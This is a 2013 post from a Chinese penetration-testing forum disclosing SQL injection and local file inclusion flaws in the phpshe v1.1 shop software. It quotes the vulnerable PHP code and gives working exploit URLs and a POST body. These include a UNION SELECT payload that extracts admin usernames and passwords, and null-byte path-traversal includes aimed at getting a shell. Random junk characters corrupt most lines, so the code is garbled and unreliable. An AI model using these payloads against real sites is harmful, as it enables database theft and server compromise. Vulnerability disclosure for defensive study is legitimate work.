找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2288|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
; E9 ?5 Q) q; N/* Phpshe v1.1 Vulnerability$ _" Y7 [7 X0 A, ?+ m4 w, A$ B! F
/* ========================/ A6 N, R3 ]' z) A
/* By: : Kn1f3
3 G3 W- f8 V# ^/* E-Mail : 681796@qq.com
, L' h/ ]/ Z5 O. G6 E/*******************************************************/
% j3 s# D1 n9 o( }) ?. |0×00 整体大概参数传输! z' [  s% g4 G: u$ S
! F* I1 k5 V) A+ @5 D
  v2 Q* C  }! V. m0 G2 M

, o4 j& c3 X, V/ P/ f//common.php: v, A8 w: {9 K2 v
if (get_magic_quotes_gpc()) {
, m% t- V3 R4 J% p!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
* ?/ y- s& E- k0 u!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');4 `/ U0 j/ n: x$ T$ |1 D6 Z
}
6 u& Z$ [3 i- U4 g" `else {7 D3 C0 Q1 i4 g3 Z- @/ J
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');! o; U! p8 I; L" Z
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
$ ~9 @0 ~9 o- t. {}8 {; s' n" Q) J! r; x# |+ \3 Y* w' n
session_start();5 p# B$ N0 `- R( j) R3 U" _; ^+ g
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');) N2 ?" B/ G- k. @" w1 c( S) [( [
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
1 p+ S$ w" X- ^% }$ g0 \
; D/ E0 p  {2 h) d& e7 a$ L0×01 包含漏洞
, G, u. ]$ f5 j$ _* o4 B4 ?8 h" X6 h 2 j* J# O" V+ M( p2 i2 ]1 W% p. Q

9 ]+ _! }+ k. G; ]3 _" x$ \. H//首页文件
2 j+ d, t- [: K' n1 C7 J9 q<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
5 `+ p9 R4 _+ K) o6 {; u" qinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
; F( B, d4 ^$ i- C3 i) jpe_result();
  L# q) o  J3 h: g9 Z1 R4 {?>5 B: ?/ ^2 T5 Q6 d1 F; ^5 t
//common 文件 第15行开始+ Z: {4 O' l: g' e% X( L
url路由配置
/ `3 e& T. s/ j! K1 ~: C2 o: ]5 f$module = $mod = $act = 'index';6 R5 u0 d0 i; h1 p% @) Q6 Q
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
+ |) Q& S, z$ b& N6 |- G3 Y- M( S7 q$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);8 G7 Z6 I, h, U
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);5 t5 c7 |, ?  S6 H: f
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%003 q; {( k/ c' t0 P. \6 x

3 E, J, d( ?9 ^
  O9 x. L5 Z" B/ I6 n- o
0×02 搜索注入7 c/ S; O; \( ~5 z4 Z

0 T; ^7 R" m3 z9 P* {) y) `4 N  i<code id="code2">

//product.php文件4 d- D9 P1 \6 |( ]0 }4 D
case 'list':. G# x3 V' @8 m/ x: g. X# i! Z
$category_id = intval($id);
$ d& \- k7 u* l$ j$info = $db->pe_select('category', array('category_id'=>$category_id));; ~- L: b  h. e6 I
//搜索' b+ G4 e! ?" K
$sqlwhere = " and `product_state` = 1";
. |: E6 O! s6 O% Q/ Lpe_lead('hook/category.hook.php');
+ d6 q" [6 T0 g- P3 u5 Z+ x; `7 `if ($category_id) {7 F" j/ U( x) ?  s3 E
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
' \' L( q" [- H2 I}2 q6 Y: f9 E% T3 K: U! {6 m, t4 }
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
: N0 |, p, R2 ^& J2 E0 U( O$ v% |if ($_g_orderby) {; ?! m$ A) d) t) ^* [/ k
$orderby = explode('_', $_g_orderby);
9 o8 i; Q' S& D# q7 h, b) }: X, c$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";- g4 a/ b& `- o( U' k* X
}+ n+ V0 }. ?4 a! x- ~+ G- ^) ]
else {
3 z# H! n: ]% t/ x' D' Y' n$sqlwhere .= " order by `product_id` desc";: s* ]. z  ?6 u4 X/ y* p- b, F- @
}
* _8 Q1 g5 H$ p# {8 B5 e+ K$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));  l  N1 a1 a; @, }$ t- `
//热卖排行
% M3 I* D, H/ y; J! K$product_hotlist = product_hotlist();
1 h, }5 K7 g. \! G, M* X//当前路径
$ a8 R+ M; ]- X. [1 c# U7 v0 d$nowpath = category_path($category_id);
0 U- w8 w0 w0 m8 |+ ~6 y& _$seo = pe_seo($info['category_name']);
& Z( |' |* z4 U5 O2 U" E; Kinclude(pe_tpl('product_list.html'));
# O( u5 b- q4 q  F! t( _" h( s//跟进selectall函数库2 g; }; W1 M# i% T8 p
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())7 I0 e4 c- y" ~- {
{2 B; r: r5 ~% l4 e$ z- n4 }
//处理条件语句9 ~; R7 Q, h6 d$ Y; g+ \. M
$sqlwhere = $this->_dowhere($where);: m$ Z& e1 }$ S4 T
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
- g3 }* l/ V! J, M: d; \7 s}. x/ N) L! i& G9 g4 l* J$ |4 ^
//exp
; q% b  v$ u( u* Z2 o! Tproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1" F. t) i( V2 K; o1 ^

</code>
8 ^4 [! ~, }0 r& h 0 @" B- [  _* ^7 t! B% V9 W7 s
0×03 包含漏洞2& W+ h4 ]4 R4 Q' `: {+ Q
/ q/ @  y+ e0 B9 |0 `6 M
<code id="code3">

//order.php

case 'pay':


' N; {2 _  y/ U9 l3 t1 ^$order_id = pe_dbhold($_g_id);


0 w2 y! i8 P  I8 b/ v  J' V$cache_payway = cache::get('payway');

. ^- X# O( v: r' J& S: b" A
foreach($cache_payway as $k => $v) {


% z+ b" j( v3 @7 G" E( ~6 k9 O0 R2 F$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

5 k' o6 r# H6 w" Y  j  b& _
if ($k == 'bank') {


0 X* R: `+ e9 e/ I% D- s0 `4 Z4 L$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


3 N1 y& G& F5 x1 _" ?1 P6 G}

1 ?3 D: ?1 Q, q3 j/ g8 [$ [' o
}

( V! q# k2 Y/ e3 R9 A
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


; Y" K, _8 g3 M. ~/ I( V!$order['order_id'] && pe_error('订单号错误...');


# Q0 V4 m9 v  M/ d* W. tif (isset($_p_pesubmit)) {


) b: S) g& Z! Y1 ^/ Lif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


' w$ g+ U$ k6 B0 h. H, A$ S0 P$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


  |6 y1 H4 s* P6 Oforeach ($info_list as $v) {

& Q' R8 ^* |9 B, [
$order['order_name'] .= "{$v['product_name']};";
% g7 i! S( a+ B3 s

7 f  C3 Q) ]( s5 d! f% B( a6 t
}


# W; M& u2 k" o: j  ]: f; t) H: jecho '正在为您连接支付网站,请稍后...';

1 v. K0 ?% n; n4 X6 u  d* W; D
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

3 n5 I: f. h7 n% }
}//当一切准备好的时候就可以进行"鸡肋包含了"

# G  f0 \* F) D
else {

8 s! b7 o7 s  Y
pe_error('支付错误...');


4 X; q  ]8 {, n9 h& k) u9 r}

/ L. _3 C' l6 H# j
}

% t' l' M% z  q0 ^$ H8 @
$seo = pe_seo('选择支付方式');

3 |; [+ v* I, R1 g% A$ A5 B
include(pe_tpl('order_pay.html'));


! ?0 z& H) f4 n8 q& |break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>* J; }5 B1 g& |% G# B8 i9 g

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表